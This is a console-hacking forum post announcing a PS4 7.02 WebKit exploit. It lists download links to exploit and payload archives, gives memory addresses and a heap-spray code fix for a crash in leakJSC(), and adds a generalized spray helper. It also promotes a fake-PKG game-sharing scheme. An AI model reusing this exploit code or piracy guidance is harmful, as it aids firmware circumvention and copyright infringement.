PS4 Jailbreaking · Thread starter: PSXHAX · Start date: Dec 14, 2020 at 7:48 PM · 111,002 · 123
Status: Not open for further replies.
Following the This is for the Pwners presentation at Black Hat Europe 2020 and the Talos WebSocket vulnerability disclosure, PlayStation 4 developer sleirsgoevy shared on Twitter a PS4 WebKit exploit for 7.02 with arbitrary read / write access. It can be chained with the previously released PS4 7.02 Kernel Exploit (KEX); before his fix for the crash in leakJSC() the success rate on 7.02 PS4 OFW was about 10%. Alongside it come 7.02 Mira and payload ports via @Al Azif, who reminds everyone NOT to enable IDU Mode (read HERE why) and stated the following on Twitter:

⚠️ "Down time should be minimal but if you are already on an exploitable firmware you should probably hold up a bit to make sure everything is working."

Download:
  • PS4-webkit-exploit-7.02.rar (33.8 KB)
  • PS4-webkit-exploit-6.XX-master.zip / GIT
  • PS4-webkit-exploit-7.02-master.zip / GIT (Fork by sleirsgoevy) / Demo
  • payloads_1.0.5.zip / GIT
  • 702_MACROSS_COLLECTION_FOR_SLEIRSGOEVY.rar
  • Mira 7.00-7.02 PS4 Ports / GIT
  • PS4 7.02 Punch Payload Injector
  • 7.02 PS4 OFW PUP
  • test-payloads.7z (34.96 KB)
  • test-payloads-v2.7z (37.92 KB)

:note: For those in the PlayStation 4 Scene who are curious, HERE and HERE are lists of games through 7.02 that are not currently working with the 6.72 PS4 Jailbreak Exploit.

:idea: If you haven't done so yet, be sure to follow the PSXHAX Member Verification & PS4 Fake PKG (FPKG) Sharing Guide to become a Verified Member by getting a Blue Verified Badge (FAQ in the spoiler HERE) through our PSXHAX Floating Discord Channel to access private or restricted areas for the latest FPKG game releases! 🏴‍☠️

Some valid 7.02 addresses:
  • 0x200eb00d8
  • 0x200f300d8
  • 0x200fb00d8
  • 0x2011100d8
The success rate is about 10% for the last one. Unfortunately the exploit then crashes in the critical section in leakJSC. Will now investigate how to fix it.
Fix for the crash in leakJSC(): after debug_log("[+] Got a relative read"); insert:
Code:
// LENGTH_STRINGIMPL is defined elsewhere in the exploit (size of WebKit's StringImpl header).
// Each key is 8 * 2 * 8 - LENGTH_STRINGIMPL characters long, so the key's StringImpl header
// plus its inline character data comes to 128 bytes. The zero-padded counter keeps all
// 100000 keys distinct and of identical length.
var tmp_spray = {};
for (var i = 0; i < 100000; i++)
    tmp_spray['Z'.repeat(8 * 2 * 8 - 5 - LENGTH_STRINGIMPL) + ('' + i).padStart(5, '0')] = 0x1337;
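As an added example (not part of sleirsgoevy's post or of the exploit itself), the string-key spray from the fix above is generalized so that the key length is derived from a target allocation size and the suffix width from the key count, with a check that every key really lands on the intended size. LENGTH_STRINGIMPL is the exploit's own constant for the StringImpl header size; the value 20 below is an assumption used only so the snippet runs stand-alone, and sprayStringKeys / checkSpray are names introduced here.

```javascript
// Added example, not the exploit's code. Generalizes the tmp_spray fix:
// key length = targetBytes - header, suffix width = digits needed for `count`.

// Assumption: the exploit defines LENGTH_STRINGIMPL itself; 20 is used here
// only so the example runs stand-alone.
const LENGTH_STRINGIMPL = 20;

// Decimal digits needed to number `count` keys from 0, so every key is
// distinct and all keys have exactly the same length (the fix uses 5 for 100000).
function suffixWidth(count) {
  return String(count - 1).length;
}

// Characters in a Latin-1 key whose StringImpl header plus inline character
// data fills `targetBytes`. The fix uses targetBytes = 8 * 2 * 8 = 128.
function keyLength(targetBytes, headerBytes) {
  const len = targetBytes - headerBytes;
  if (len <= 0) throw new RangeError("target smaller than StringImpl header");
  return len;
}

// Build the spray object: `count` distinct property keys of identical length.
// Keys start with a non-digit so they are never treated as array indices.
function sprayStringKeys(count, targetBytes, headerBytes = LENGTH_STRINGIMPL,
                         filler = "Z", value = 0x1337) {
  const width = suffixWidth(count);
  const len = keyLength(targetBytes, headerBytes);
  if (len <= width) throw new RangeError("key too short to hold the unique suffix");
  const prefix = filler.repeat(len - width);
  const spray = {};
  for (let i = 0; i < count; i++) {
    spray[prefix + String(i).padStart(width, "0")] = value;
  }
  return spray;
}

// Sanity-check a spray object: all keys the same length, and header plus
// character data of each key equal to targetBytes.
function checkSpray(spray, targetBytes, headerBytes = LENGTH_STRINGIMPL) {
  const keys = Object.keys(spray);
  const lens = new Set(keys.map(k => k.length));
  const uniform = lens.size === 1;
  const keyLen = uniform ? [...lens][0] : NaN;
  return {
    count: keys.length,
    keyLength: keyLen,
    uniform,
    bytesPerKey: uniform ? keyLen + headerBytes : NaN,
    fillsTarget: uniform && keyLen + headerBytes === targetBytes,
  };
}

// Reproduce the parameters of the fix: 100000 keys at 128 bytes each.
const report = checkSpray(sprayStringKeys(100000, 128), 128);
console.log(report);
```

With the assumed header size of 20, each key is 108 characters (103 filler characters plus a 5-digit suffix), matching the fix's 'Z'.repeat(128 - 5 - 20) followed by padStart(5, '0'); changing LENGTH_STRINGIMPL or the target size recomputes the prefix length without touching the loop.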

:arrow: Update: It appears the 7.02 WebKit exploit also works on 7.51 through 7.55, but keep in mind that the current kernel exploit only supports up to 7.02, so users on those higher firmwares will have to wait for a newer KEX to be released publicly before a full jailbreak is possible.

PS4 7.51 WEBKIT EXPLOIT CONFIRMED via Quenlood

THIS IS NOT A FULL JAILBREAK AND THE WEBKIT EXPLOIT IS NOT STABLE, BUT IT IS ABSOLUTELY WORKING.

FOR 7.02 I THINK IT'S GOING TO BE JAILBROKEN SOON, BUT FOR 7.51 WE NEED TO WAIT FOR A KERNEL EXPLOIT. :(

THANKS SLEIRSGOEVY

[Image: PS4 WebKit Exploit 7.02 with Arbitrary Read Write Access and Payloads]